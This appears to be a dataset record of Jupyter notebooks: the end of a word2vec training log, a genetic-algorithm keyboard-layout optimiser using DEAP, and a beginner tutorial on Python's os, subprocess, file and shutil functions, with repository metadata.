army\nd | seven, american, two, eight, born\nuse | be, usually, will, can, is\nwho | his, by, in, he, as\ntime | to, and, at, all, not\nif | can, is, be, which, are\nby | the, of, in, to, as\nfrac | x, quad, formula, left, e\ntaking | carlsberg, faith, movie, times, utterances\nprimarily | has, puzzle, vec, frontiers, ought\nscale | sides, satin, water, other, objected\nquite | here, arabic, how, described, aromatics\nanimals | telescope, poisoned, a, eia, while\ndefense | pediment, military, demonstrators, othello, codeword\nwoman | sauces, birth, byrne, who, oracle\n...\n\nEpoch: 1/3\nLoss: 3.4148216247558594\non | and, in, s, two, of\nbeen | as, by, his, that, and\nfor | the, in, and, of, an\nthere | are, as, their, and, of\nknown | in, as, work, an, by\nsome | their, it, for, these, considered\nwhere | the, as, a, time, on\nwhich | this, of, to, the, as\narticles | grapple, superb, university, traditionally, science\ngrand | nine, again, american, player, september\ntest | pressure, helps, bat, parameter, cruisers\nhttp | www, links, org, information, eight\nwriters | life, science, births, winning, saint\noperating | windows, available, software, versions, programmers\naccepted | contrary, sin, churches, not, held\nliberal | political, president, government, democratic, party\n...\n\nEpoch: 1/3\nLoss: 3.107332706451416\nas | a, of, and, to, the\nseven | three, nine, one, eight, five\nto | the, as, in, and, an\nthis | example, for, can, a, if\nmost | its, and, it, to, with\nstates | united, nations, federal, constitution, state\nwhen | to, an, was, the, would\nor | are, can, form, used, and\nversions | software, operating, released, computer, based\ninstitute | university, national, nobel, richard, school\ndefense | military, rights, forces, against, army\nroad | east, railway, player, home, sports\nadditional | using, require, number, programs, cost\nexistence | within, nature, meaning, nor, beliefs\nhold | not, cause, god, divine, that\napplied | words, word, forms, particular, 
theory\n...\n\nEpoch: 2/3\nLoss: 2.721822738647461\npeople | s, age, also, children, among\nth | century, eastern, roman, west, east\nduring | early, after, war, later, against\nbut | have, or, which, usually, not\nthe | of, in, and, to, on\nare | is, a, or, different, form\nwere | he, never, from, entered, to\nuse | are, for, or, into, like\npre | middle, less, article, also, latin\ninstitute | studies, research, press, articles, engineering\ntest | a, using, nuclear, weapons, played\nsquare | area, city, river, metres, valley\ncentre | city, cities, town, railway, station\nprofessional | baseball, team, leagues, association, sports\nhold | that, nor, way, believe, them\nwoman | love, her, she, my, him\n...\n\nEpoch: 2/3\nLoss: 2.7671380043029785\nseven | six, five, one, two, nine\nas | which, of, also, the, for\nto | the, they, with, not, that\neight | five, six, one, nine, four\nmost | some, in, and, a, generally\nsystem | programs, process, use, method, systems\nwhen | with, the, off, to, fourth\nand | of, the, in, with, have\nbehind | at, record, the, on, ground\nexperience | theories, mind, whether, spiritual, ideas\ndefense | armed, defence, military, government, personnel\nbrother | married, son, wife, his, him\nshows | a, showing, the, since, often\negypt | ethiopia, syria, bc, ancient, empire\nmagazine | newspaper, com, comedy, science, book\ntest | control, involves, testing, project, trained\n...\n\nEpoch: 2/3\nLoss: 2.6753008365631104\nwith | a, to, an, by, the\nsix | one, four, five, nine, seven\nzero | one, five, nine, two, four\nover | zero, estimated, two, a, total\nafter | killed, had, returned, was, she\ntime | to, when, this, event, moment\nfirst | was, one, title, actress, sir\nmore | even, have, many, being, very\nexperience | knowledge, brain, theories, social, much\nreport | program, reports, environmental, intelligence, development\nuniverse | earth, quantum, mechanics, dark, gravity\naward | awards, oscar, nominations, academy, film\ngrand | west, italy, adopted, south, holland\nnotes | s, classical, external, one, instrument\nprofessional | association, teams, davis, regularly, baseball\ngovernor | republican, england, constitution, scotland, minister\n...\n\nEpoch: 2/3\nLoss: 2.803065061569214\nduring | war, soviet, after, army, ended\nthey | that, while, these, almost, and\nworld | organized, has, national, history, as\nnine | one, zero, six, eight, two\nmay | to, a, however, take, must\nthere | if, to, is, a, directly\nwho | he, mother, him, i, she\nare | called, can, different, is, which\nmathematics | theory, mathematical, mathematicians, computation, geometry\nolder | age, low, versus, household, below\nsmith | james, george, robert, john, oxford\ndr | robert, directed, nine, actor, d\nderived | word, other, written, words, meaning\naccount | thought, theories, how, these, life\nfreedom | rights, freedoms, criticized, faire, moral\ntaking | joined, s, but, when, prevent\n...\n\nEpoch: 2/3\nLoss: 2.720899820327759\nworld | the, in, of, four, york\nwould | him, again, had, did, lost\namerican | actor, actress, player, singer, canadian\nother | often, from, those, to, in\nunited | states, u, nations, canada, member\nall | only, that, the, being, or\nif | will, can, must, get, that\nsee | external, links, list, official, history\nsomething | thing, we, says, why, sense\nshown | pre, suggests, without, behave, evidence\negypt | syria, egyptian, arab, israel, islamic\npowers | power, of, following, resolution, regime\npope | emperor, xii, catholic, iv, 
bishop\nconsists | are, is, the, area, located\npolice | forces, armed, army, killed, killing\nbible | testament, text, hebrew, prophets, tanakh\n...\n\nEpoch: 2/3\nLoss: 2.5932250022888184\nit | a, to, on, will, and\nthree | five, one, two, six, nine\nmay | two, five, three, not, this\nhe | him, his, friend, when, was\nstate | missouri, located, lies, north, southeastern\ns | and, john, nine, six, eight\nthis | if, instead, can, to, or\nthey | them, themselves, in, their, have\nbbc | television, radio, day, broadcast, listing\nstage | show, featured, films, best, film\nrunning | run, unix, processor, pc, on\nliberal | liberals, party, democrat, liberalism, political\nversions | mac, windows, version, software, operating\nrise | period, political, by, considerably, into\njoseph | john, thomas, politician, theologian, composer\nscale | scales, ratios, key, octave, tuning\n...\n\n" ] ], [ [ "## Visualizing the word vectors\n\nBelow we'll use T-SNE to visualize how our high-dimensional word vectors cluster together. T-SNE is used to project these vectors into two dimensions while preserving local stucture. Check out [this post from Christopher Olah](http://colah.github.io/posts/2014-10-Visualizing-MNIST/) to learn more about T-SNE and other ways to visualize high-dimensional data.", "_____no_output_____" ] ], [ [ "%matplotlib inline\n%config InlineBackend.figure_format = 'retina'\n\nimport matplotlib.pyplot as plt\nfrom sklearn.manifold import TSNE", "_____no_output_____" ], [ "# getting embeddings from the embedding layer of our model, by name\nembeddings = model.in_embed.weight.to('cpu').data.numpy()", "_____no_output_____" ], [ "viz_words = 380\ntsne = TSNE()\nembed_tsne = tsne.fit_transform(embeddings[:viz_words, :])", "_____no_output_____" ], [ "fig, ax = plt.subplots(figsize=(16, 16))\nfor idx in range(viz_words):\n plt.scatter(*embed_tsne[idx, :], color='steelblue')\n plt.annotate(int_to_vocab[idx], (embed_tsne[idx, 0], embed_tsne[idx, 1]), alpha=0.7)", "_____no_output_____" ], [ "#", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ] ]
cb1c353f120f2255c4ac2156dea7ce36ae4a34fd
66,569
ipynb
Jupyter Notebook
notebooks/1.0-jf-en-test.ipynb
joaopfonseca/dssgsummit2020-challenge
04dd7896fd0df4349291ad4d4919bbe7cff9f830
[ "MIT" ]
null
null
null
notebooks/1.0-jf-en-test.ipynb
joaopfonseca/dssgsummit2020-challenge
04dd7896fd0df4349291ad4d4919bbe7cff9f830
[ "MIT" ]
1
2021-09-09T09:00:36.000Z
2021-09-09T09:00:36.000Z
notebooks/1.0-jf-en-test.ipynb
joaopfonseca/dssgsummit2020-challenge
04dd7896fd0df4349291ad4d4919bbe7cff9f830
[ "MIT" ]
null
null
null
46.780745
111
0.601496
[ [ [ "import os\nfrom os.path import join, pardir\nfrom collections import Counter\nfrom copy import deepcopy\nimport numpy as np\nfrom deap import base, creator, algorithms, tools\nfrom dssg_challenge import compute_cost, check_keyboard\n\nRNG_SEED = 0\nDATA_DSSG = join(pardir, 'data', 'processed')\n\nrng = np.random.RandomState(RNG_SEED)", "_____no_output_____" ], [ "os.listdir(DATA_DSSG)", "_____no_output_____" ], [ "# get keys\nwith open(join(DATA_DSSG, 'en-keys.txt'), 'r') as file:\n keys = file.read()\n\n# get corpus example\nwith open(join(DATA_DSSG, 'en-corpus.txt'), 'r') as file:\n corpus = file.read()\n\nkeys = ''.join(keys.split('\\n'))\ncorpus = ''.join(corpus.split(keys)).split('\\n')[0]", "_____no_output_____" ] ], [ [ "Some keys are used to signal special characters. Namely,\n\n- The ENTER key is represented as 0.\n- The shift key for capitalization is represented as ^.\n- The backspace key is represented as <.\n- All the remaining characters not found in the valid keys are encoded as #.\n- Empty keys will contain the character _.\n", "_____no_output_____" ] ], [ [ "len(keys), keys", "_____no_output_____" ] ], [ [ "## The most basic approaches", "_____no_output_____" ] ], [ [ "Counter(corpus).most_common()[:10]", "_____no_output_____" ], [ "baseline = ''.join([i[0] for i in Counter(corpus).most_common()])\nbaseline = baseline + ''.join([i for i in keys if i not in baseline]) + ' T'\nbaseline", "_____no_output_____" ], [ "shuffled = list(baseline)\nrng.shuffle(shuffled)\n\nanthony = 'EINOA TCGVDURL<^SWH_Z__XJQFPBMY,#.0K?'\n\ncheck_keyboard(baseline, keys)\ncheck_keyboard(keys+' T', keys)\ncheck_keyboard(shuffled, keys)\ncheck_keyboard(''.join([i if i!='_' else ' ' for i in anthony]), keys)\n\nprint('Shuffled cost:\\t\\t\\t', compute_cost(''.join(shuffled), corpus))\nprint('Original keys cost:\\t\\t', compute_cost(keys+' ', corpus))\nprint('Baseline cost:\\t\\t\\t', compute_cost(baseline, corpus))\nprint('Anthony Carbajal\\'s solution:\\t', compute_cost(''.join([i for i in anthony if i!='_']), corpus))", "Shuffled cost:\t\t\t 233432.54787591402\nOriginal keys cost:\t\t 215629.56595268694\nBaseline cost:\t\t\t 170178.49650661062\nAnthony Carbajal's solution:\t 158733.94185884856\n" ] ], [ [ "## First attempt with GA", "_____no_output_____" ] ], [ [ "keys_list = list(keys)\n\ndef evaluate(individual):\n \"\"\"\n Computes the cost for each individual.\n \"\"\"\n try:\n check_keyboard(individual, keys)\n return [compute_cost(''.join(list(individual)), corpus)]\n except AssertionError:\n return [np.inf]\n\ndef mutFlip(ind1, ind2):\n \"\"\"Execute a two points crossover with copy on the input individuals. 
The\n copy is required because the slicing in numpy returns a view of the data,\n which leads to a self overwritting in the swap operation.\n \"\"\"\n\n ind = ind1.copy()\n for x, value in np.ndenumerate(ind):\n if np.random.random() < .05:\n ind[x] = np.random.choice(keys_list)\n try:\n check_keyboard(ind, keys)\n return ind, ind2\n except AssertionError:\n return mutFlip(individual, ind2)\n \n return ind, ind2\n", "_____no_output_____" ], [ "creator.create('FitnessMin', base.Fitness, weights=(-1.0,))\ncreator.create('Individual', np.ndarray, fitness=creator.FitnessMin)\n\ntoolbox = base.Toolbox()\n\n# Tool to randomly initialize an individual\ntoolbox.register('attribute',\n np.random.permutation, np.array(list(baseline))\n)\n\ntoolbox.register('individual',\n tools.initIterate,\n creator.Individual,\n toolbox.attribute\n)\n\ntoolbox.register('population',\n tools.initRepeat,\n list,\n toolbox.individual\n)\n\ntoolbox.register(\"evaluate\", evaluate)\ntoolbox.register(\"mate\", tools.cxOnePoint)\ntoolbox.register(\"mutate\", tools.mutShuffleIndexes, indpb=0.05)\ntoolbox.register(\"select\", tools.selTournament, tournsize=3)\n\ndef main():\n np.random.seed(64)\n\n pop = toolbox.population(n=20)\n\n # Numpy equality function (operators.eq) between two arrays returns the\n # equality element wise, which raises an exception in the if similar()\n # check of the hall of fame. Using a different equality function like\n # numpy.array_equal or numpy.allclose solve this issue.\n hof = tools.HallOfFame(1, similar=np.array_equal)\n\n stats = tools.Statistics(lambda ind: ind.fitness.values)\n stats.register(\"avg\", np.mean)\n stats.register(\"std\", np.std)\n stats.register(\"min\", np.min)\n stats.register(\"max\", np.max)\n\n algorithms.eaSimple(pop, toolbox, cxpb=0, mutpb=0.6, ngen=1000, stats=stats,\n halloffame=hof)\n\n return pop, stats, hof\n\n\npop, stats, hof = main()\n", "gen\tnevals\tavg \tstd \tmin \tmax \n0 \t20 \t230711\t11730.7\t211328\t253526\n1 \t15 \t222479\t8550.19\t209768\t236974\n2 \t12 \t214193\t5623.62\t207266\t225510\n3 \t10 \t211550\t3468.81\t207065\t217218\n4 \t17 \t210912\t4420.74\t202385\t220128\n5 \t15 \t210301\t5659 \t203495\t225716\n6 \t12 \t207232\t4177.73\t201347\t222048\n7 \t13 \t204788\t3706.67\t197492\t211939\n8 \t14 \t204308\t8192.06\t194556\t230339\n9 \t8 \t200895\t4927.39\t194556\t214215\n10 \t12 \t199904\t6442.03\t194556\t218699\n11 \t11 \t197678\t5048.9 \t191092\t209712\n12 \t11 \t197839\t6423.91\t191092\t214188\n13 \t11 \t195342\t3585.77\t191092\t206202\n14 \t13 \t197410\t7784.7 \t184579\t221685\n15 \t15 \t194385\t3853 \t184615\t202499\n16 \t13 \t194296\t4752.53\t184615\t210685\n17 \t10 \t192349\t4214.85\t184615\t206343\n18 \t12 \t193349\t7550.42\t184527\t210265\n19 \t11 \t190577\t4752.73\t184527\t198599\n20 \t10 \t187571\t6122.38\t182779\t209967\n21 \t10 \t187279\t4831.65\t181872\t200383\n22 \t14 \t185843\t3544.15\t181872\t196038\n23 \t9 \t186302\t6123.17\t180905\t209643\n24 \t9 \t183227\t2155.48\t180905\t189297\n25 \t11 \t184535\t5611.92\t180340\t196771\n26 \t11 \t182395\t4585.51\t177575\t197738\n27 \t12 \t184535\t6207.96\t177575\t200388\n28 \t10 \t182443\t6489.68\t176577\t196782\n29 \t13 \t181069\t4430.22\t176577\t194684\n30 \t10 \t182859\t6988.37\t176522\t198157\n31 \t10 \t182038\t7790.69\t176522\t208959\n32 \t14 \t182398\t6291.71\t176577\t195197\n33 \t10 \t181843\t8256.59\t176577\t212704\n34 \t14 \t182574\t9288.34\t176502\t217502\n35 \t13 \t183934\t8684.5 \t176502\t212740\n36 \t14 \t181658\t6360.25\t176413\t197009\n37 \t12 
\t182478\t6336.01\t176413\t196384\n38 \t12 \t180112\t5008.14\t175503\t193652\n39 \t12 \t181617\t6438.65\t174377\t200574\n40 \t10 \t183045\t8858.05\t174377\t201925\n41 \t15 \t181915\t6589.23\t175195\t199162\n42 \t8 \t180400\t5538.84\t175195\t193975\n43 \t14 \t179930\t5613.02\t175195\t194874\n44 \t16 \t181333\t7880.09\t175195\t202496\n45 \t10 \t179740\t4403.31\t174646\t187881\n46 \t8 \t178819\t4677.32\t174646\t191459\n47 \t9 \t177792\t5738.86\t174646\t194209\n48 \t11 \t178618\t7246.05\t174571\t201443\n49 \t8 \t176368\t3453.6 \t174325\t188301\n50 \t14 \t179246\t5620.92\t174646\t194244\n51 \t12 \t178292\t5172.56\t173336\t189574\n52 \t13 \t179485\t6873.19\t174646\t201679\n53 \t8 \t176438\t3600.03\t174646\t190088\n54 \t17 \t181210\t5375.86\t174646\t190507\n55 \t12 \t181785\t6417.51\t174646\t199822\n56 \t13 \t182406\t9849.71\t174646\t212548\n57 \t9 \t179617\t6538.78\t174582\t198882\n58 \t14 \t180167\t7892.95\t173681\t204530\n59 \t12 \t177069\t4112.44\t174036\t185971\n60 \t12 \t180362\t8411.76\t174036\t203764\n61 \t11 \t180600\t7480.89\t174178\t198143\n62 \t11 \t180769\t7709.31\t174178\t200135\n63 \t11 \t180500\t7571.47\t174178\t202709\n64 \t9 \t177210\t4672.29\t174178\t193642\n65 \t13 \t176781\t3333.4 \t174178\t185340\n66 \t13 \t179430\t6582.26\t174088\t199153\n67 \t13 \t180419\t8318.97\t174088\t206448\n68 \t13 \t179073\t5743.28\t172496\t191052\n69 \t10 \t177456\t7233.7 \t172496\t202823\n70 \t12 \t178707\t6916.89\t172496\t193401\n71 \t9 \t176651\t5885.87\t172496\t190207\n72 \t13 \t178697\t6525.38\t172496\t191481\n73 \t11 \t179656\t7404.97\t172496\t192110\n74 \t14 \t181049\t10354.1\t171997\t206155\n75 \t13 \t179094\t8693.91\t171997\t197229\n76 \t13 \t177101\t6647.08\t171997\t196992\n77 \t13 \t178174\t7962.03\t171756\t198465\n78 \t11 \t175583\t6038.76\t170625\t193685\n79 \t11 \t173884\t4991.44\t169447\t190684\n80 \t10 \t173983\t4347.84\t169447\t184706\n81 \t12 \t175084\t6906.59\t167546\t192319\n82 \t13 \t175975\t8375.29\t167546\t196819\n83 \t7 \t171575\t5757.11\t167342\t184955\n84 \t12 \t172388\t6006.8 \t167342\t190256\n85 \t11 \t170481\t3594.39\t167302\t181407\n86 \t12 \t174506\t9805.36\t167302\t196027\n87 \t13 \t171691\t5318.97\t164995\t181548\n88 \t15 \t170627\t4565.68\t164995\t182858\n89 \t12 \t170967\t5831.86\t164995\t185501\n90 \t15 \t171523\t6346.49\t164995\t189328\n91 \t15 \t172581\t7857.83\t165038\t196295\n92 \t14 \t171328\t5679.7 \t165038\t187777\n93 \t11 \t173599\t8436.08\t165038\t201001\n94 \t12 \t170483\t7129.31\t165038\t192735\n95 \t11 \t167963\t3931.45\t165038\t179160\n96 \t14 \t173219\t10385.3\t164871\t205740\n97 \t11 \t171560\t6572.61\t165038\t182311\n98 \t12 \t172708\t9055.16\t165038\t193779\n99 \t10 \t169903\t9116.58\t164265\t199570\n100\t13 \t170773\t5572.86\t165038\t185380\n101\t13 \t173633\t8921.25\t165038\t197209\n102\t12 \t173301\t7131.17\t164760\t184754\n103\t14 \t173760\t10320.9\t164197\t196778\n104\t10 \t170185\t9394.72\t164197\t199671\n105\t9 \t166327\t3610.49\t164197\t177634\n106\t10 \t167013\t4708.33\t164197\t184340\n107\t17 \t175193\t9952.64\t164197\t193980\n108\t13 \t169386\t4914.86\t164197\t183130\n109\t14 \t172906\t9068.78\t163166\t194614\n110\t12 \t171771\t10347.5\t163166\t198590\n111\t12 \t167348\t5106.06\t163166\t182036\n112\t12 \t166964\t4798.41\t163166\t177070\n113\t17 \t169818\t5721.64\t163166\t178858\n114\t7 \t166967\t7969.63\t163166\t192849\n115\t11 \t166782\t5393.36\t163166\t186277\n116\t13 \t168037\t5130.24\t163166\t179159\n117\t9 \t168431\t7581.31\t163166\t190881\n118\t13 \t167737\t5082.46\t163166\t179668\n119\t14 
\t172820\t9316.87\t163166\t194549\n120\t10 \t170830\t8370.02\t163166\t191847\n121\t13 \t168564\t8524.02\t163166\t193959\n122\t12 \t170065\t9852.19\t163166\t193709\n123\t15 \t170540\t7672.06\t163166\t185758\n124\t8 \t167090\t6368.98\t163166\t182635\n125\t11 \t166840\t6301.73\t163166\t181559\n126\t8 \t165616\t4281.25\t163166\t181152\n127\t10 \t166131\t6722.53\t163166\t192394\n128\t13 \t167027\t6837.96\t162876\t192061\n129\t10 \t166753\t5684.07\t163166\t183298\n130\t11 \t170795\t10614.4\t163166\t204719\n131\t11 \t170351\t9718.45\t163166\t192580\n132\t11 \t170641\t10048.3\t163166\t198160\n133\t13 \t168463\t7047.36\t163166\t188973\n134\t12 \t167177\t5283.04\t163166\t180947\n135\t13 \t166072\t4566.28\t163166\t178533\n136\t14 \t171450\t8909.09\t163166\t188737\n137\t14 \t168794\t6662.18\t163166\t184530\n138\t11 \t169133\t8691.14\t161695\t193449\n139\t11 \t167483\t6037.18\t161695\t182014\n140\t12 \t168132\t6301 \t161695\t187202\n141\t6 \t168798\t9503.84\t161695\t197025\n142\t9 \t166489\t5122.38\t161695\t181379\n143\t12 \t171232\t10449 \t161695\t195839\n144\t13 \t169890\t10017.3\t161695\t199594\n145\t15 \t168858\t11593.3\t161355\t213691\n146\t11 \t166717\t6508.59\t161306\t185649\n147\t10 \t166574\t7034.82\t161137\t183914\n148\t14 \t166047\t6473.04\t161355\t178072\n149\t9 \t165694\t7330.41\t161355\t189956\n150\t15 \t168371\t7330.73\t161355\t184767\n151\t15 \t171668\t8337 \t161355\t189535\n152\t11 \t167545\t4521.45\t161355\t179237\n153\t7 \t165862\t5091.14\t161355\t180796\n154\t11 \t165960\t5355.06\t161555\t179945\n155\t7 \t167833\t9778.81\t161555\t194134\n156\t12 \t165972\t5558.08\t161555\t176910\n157\t14 \t165920\t5549.04\t161555\t180260\n158\t16 \t168336\t8344.66\t161555\t197049\n159\t11 \t167740\t9128.43\t161555\t193941\n160\t12 \t166046\t5371.02\t161555\t179059\n161\t16 \t169438\t8607.4 \t161555\t191226\n162\t13 \t168888\t7318.33\t161555\t191511\n163\t11 \t168086\t7923.72\t161555\t192995\n164\t11 \t166100\t5833.23\t161555\t184096\n165\t12 \t166436\t5558.09\t161555\t179561\n166\t11 \t167041\t8444.18\t161555\t189875\n167\t12 \t168754\t9553.91\t161555\t192033\n168\t10 \t166234\t5665.42\t161555\t180845\n169\t10 \t164948\t5095.38\t161555\t182528\n170\t14 \t170754\t11081.6\t161555\t203584\n171\t11 \t166915\t6234.59\t161239\t182740\n172\t12 \t169654\t9303.54\t161555\t196916\n173\t14 \t167514\t6553.04\t161555\t181657\n174\t10 \t168643\t11881.7\t160984\t206204\n175\t10 \t165756\t6996.1 \t160984\t191283\n176\t7 \t165683\t8068.27\t160984\t191333\n177\t12 \t170644\t9927.57\t160984\t192660\n178\t11 \t166709\t6830.31\t161555\t185898\n179\t12 \t167440\t8638.28\t161555\t186510\n180\t13 \t165195\t5595.88\t160995\t183680\n181\t10 \t166771\t8181.47\t160995\t186450\n182\t7 \t164105\t5388.9 \t160995\t181226\n183\t12 \t166890\t8115.35\t160995\t188081\n184\t12 \t166559\t6618.23\t160995\t183637\n185\t14 \t167931\t6236.71\t160995\t178720\n186\t9 \t171275\t14501.8\t160995\t221580\n187\t12 \t168542\t11564.8\t160995\t211673\n188\t12 \t167217\t8075.74\t160995\t189707\n189\t10 \t164718\t5102.39\t160995\t180096\n190\t13 \t167763\t8632.89\t160995\t191313\n191\t13 \t167060\t9652.14\t160995\t200076\n192\t14 \t167205\t8477.47\t161312\t197058\n193\t15 \t166268\t5021.67\t161312\t180602\n194\t15 \t170248\t8295.61\t161312\t187857\n195\t12 \t169758\t8349.08\t161312\t186459\n196\t15 \t173258\t9325.69\t161312\t194145\n197\t11 \t167862\t7797.4 \t161312\t198840\n198\t12 \t166032\t3400.65\t161312\t172686\n199\t15 \t167423\t7578.85\t162497\t189425\n200\t13 \t168163\t6730.3 \t162497\t186318\n201\t12 \t165541\t4688.54\t161554\t179886\n202\t14 
\t168997\t7175.44\t161554\t183345\n203\t10 \t169765\t7796.96\t162497\t188678\n" ], [ "''.join(list(hof)[0])", "_____no_output_____" ], [ "check_keyboard(''.join(list(hof)[0]), keys)\ncompute_cost(''.join(list(hof)[0]), corpus)", "_____no_output_____" ], [ "check_keyboard(' RDSTOECP#<WINALGYKX , ^0.ZMFHUJVBT?Q', keys)\ncompute_cost(' RDSTOECP#<WINALGYKX , ^0.ZMFHUJVBT?Q', corpus)", "_____no_output_____" ] ], [ [ "## Hall of fame solutions\n\n ' ONYTIAIMZGBCHEDRSL,P#.^0TQX VK?W<JFU' - 1673.418\n ' REASTO<DGWVPMILNYHTJC ^0. #?X,QUBZFK' - 1637.709\n ' RDSTOECP#<WINALGYKX , ^0.ZMFHUJVBT?Q' - 1582.775\n 'T OISLADERNMGW #UYHTVKCFPX<, ?ZJ.0^BQ' - 1597.119\n 'OSNA ETM GWYPRLV HI#.0^<J?BKC,FTUDQZX' - 1599.910", "_____no_output_____" ] ] ]
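A note on the mutation step in the record above: every candidate keyboard is a permutation of one fixed multiset of keys, so a mutation that only swaps positions can never produce an invalid layout and needs no validity retry. The sketch below is illustrative rather than taken from the notebook; the helper name `mut_swap` and the commented registration line are assumptions, and individuals are assumed to be DEAP-style 1-D NumPy arrays of characters as in the code above.

```python
import numpy as np

def mut_swap(individual, indpb=0.05):
    """Swap each position with a random partner with probability `indpb`.

    A swap only permutes characters that are already present, so the multiset
    of keys is preserved and the mutated layout stays valid.
    """
    for i in range(len(individual)):
        if np.random.random() < indpb:
            j = np.random.randint(len(individual))
            individual[i], individual[j] = individual[j], individual[i]
    return individual,

# Illustrative wiring into a DEAP toolbox like the one defined above:
# toolbox.register("mutate", mut_swap, indpb=0.05)
```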
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ] ]
cb1c3be403ac281f897d9e3eab9d04f2f6519869
10,426
ipynb
Jupyter Notebook
Notebooks/06_Manipulating_command_line/Command_line.ipynb
Anthogr/Snakes-in-Space
53a3581bacbff45818495222dc3233e1838b88ac
[ "MIT" ]
null
null
null
Notebooks/06_Manipulating_command_line/Command_line.ipynb
Anthogr/Snakes-in-Space
53a3581bacbff45818495222dc3233e1838b88ac
[ "MIT" ]
null
null
null
Notebooks/06_Manipulating_command_line/Command_line.ipynb
Anthogr/Snakes-in-Space
53a3581bacbff45818495222dc3233e1838b88ac
[ "MIT" ]
1
2021-09-08T13:18:54.000Z
2021-09-08T13:18:54.000Z
24.474178
113
0.503357
[ [ [ "# Manipulating the command line", "_____no_output_____" ] ], [ [ "import os\n\nimport subprocess\n\nimport shutil", "_____no_output_____" ] ], [ [ "# OS", "_____no_output_____" ] ], [ [ "# See contents of directory\nos.listdir('/mnt/GEN2212/')", "_____no_output_____" ], [ "# Loop over objects in directory\nfor obj in os.listdir('/mnt/GEN2212/'):\n # See if it is a directory\n if os.path.isdir('/mnt/GEN2212/' + obj):\n print(\"Directory:\\t\", obj)\n else:\n print(\"File:\\t\", obj)", "Directory:\t GEN2212.dtardif\nDirectory:\t GEN2212.qpillot\nDirectory:\t GEN2212.wbanfield\nDirectory:\t GEN2212.atoumoulin\nDirectory:\t GEN2212.apohl\nDirectory:\t GEN2212.mlaugie\nDirectory:\t GEN2212.ydonnadieu\nDirectory:\t GEN2212.asarr\nFile:\t maxs_mins_consecutive.ipynb\nDirectory:\t GEN2212.jsayago\n" ], [ "# Acces enviroment variables\nos.environ['HOME']", "_____no_output_____" ], [ "os.listdir(os.environ['HOME'])", "_____no_output_____" ] ], [ [ "# Subprocess", "_____no_output_____" ], [ "The cell below only works in jupyter ", "_____no_output_____" ] ], [ [ "!ls -al /mnt/GEN2212/", "total 27945\ndrwxrwx--- 11 root CEREGE_GEN2212 12 Apr 8 10:47 .\ndrwxr-xr-x 3 root root 4096 Sep 21 2018 ..\ndrwxr-x--x 18 apohl CEREGE_GEN2212 20 Feb 26 10:09 GEN2212.apohl\ndrwxr-xr-x 10 asarr CEREGE_GEN2212 20 May 5 17:51 GEN2212.asarr\ndrwxr-x--x 2 atoumoulin CEREGE_GEN2212 2 Sep 21 2018 GEN2212.atoumoulin\ndrwxr-xr-x 5 dtardif CEREGE_GEN2212 5 May 7 11:36 GEN2212.dtardif\ndrwxr-xr-x 5 jsayago CEREGE_GEN2212 5 Apr 26 13:45 GEN2212.jsayago\ndrwxr-x--x 4 mlaugie CEREGE_GEN2212 4 Apr 2 11:42 GEN2212.mlaugie\ndrwxr-xr-x 5 qpillot CEREGE_GEN2212 5 Mar 22 10:45 GEN2212.qpillot\ndrwxr-xr-x 11 wbanfield CEREGE_GEN2212 18 Apr 23 12:41 GEN2212.wbanfield\ndrwxr-x--x 7 ydonnadieu CEREGE_GEN2212 22 Apr 16 19:28 GEN2212.ydonnadieu\n-rw-r--r-- 1 jsayago CEREGE_GEN2212 28225795 Apr 8 10:46 maxs_mins_consecutive.ipynb\n" ] ], [ [ "A Few libraries exist:\n- os.popen\n- sys.?\n- subprocess\n\nHowever subprocess seems to be the most built out for \"complex\" tasks.\n\nTo get the results use `stdout=subprocess.PIPE` then `output.stdout.readlines()`", "_____no_output_____" ] ], [ [ "output = subprocess.Popen(['ls', '-al', '/mnt/GEN2212'], stdout=subprocess.PIPE)", "_____no_output_____" ], [ "lines = output.stdout.readlines()\nlines", "_____no_output_____" ] ], [ [ "We can then manipulate the output like strings to get info", "_____no_output_____" ] ], [ [ "for line in lines:\n line = line.decode('utf-8')\n if \"wbanfield\" in line:\n print(line)\n line = line.split(\" \")\n line = [obj for obj in line if len(obj) > 0]\n print(line)\n perm, uid, user, group, day, month, _, time, directory = line", "drwxr-xr-x 11 wbanfield CEREGE_GEN2212 18 Apr 23 12:41 GEN2212.wbanfield\n\n['drwxr-xr-x', '11', 'wbanfield', 'CEREGE_GEN2212', '18', 'Apr', '23', '12:41', 'GEN2212.wbanfield\\n']\n" ], [ "perm", "_____no_output_____" ], [ "user", "_____no_output_____" ] ], [ [ "`.wait()` waits for a process to finish before continuing to the next one.\n`cwd` argument defines the directory from which the command is executed", "_____no_output_____" ] ], [ [ "proc1 = subprocess.Popen([\"sleep\", \"2\"], cwd=\"/mnt/GEN2212\").wait()\nproc2 = subprocess.Popen([\"sleep\", \"3\"], cwd=\"/mnt\").wait()", "_____no_output_____" ] ], [ [ "# File manipulation\n\n- 'r' -> read only\n- 'a' -> create if doesn't exist else append\n- 'w' -> write this overwrites the file if it exists", "_____no_output_____" ] ], [ [ "with open(\"ferret.jnl\", \"r\") as f:\n 
print(\"\\n\".join(f.readlines()))", " ! NOAA/PMEL TMAP\n\n ! PyFerret v7.63 (optimized)\n\n ! Linux 4.15.0-1096-azure - 10/13/20\n\n ! 15-Apr-21 13:30 \n\n\n\nset mode verify\n\nno\n\nexit\n\n" ], [ "with open(\"dummy.txt\", 'w') as f:\n print(f\"User : {user} owns the Folder {directory}\")\n f.write(f\"User : {user} owns the Folder {directory}\")", "User : wbanfield owns the Folder GEN2212.wbanfield\n\n" ] ], [ [ "# Shutil", "_____no_output_____" ] ], [ [ "# Remove all objects under given directory -> equivalent to rm -rf\nshutil.rmtree(\"DIRECTORY\")", "_____no_output_____" ], [ "# Copy files (and folders?)\nshutil.copy2(source, dest)", "_____no_output_____" ] ] ]
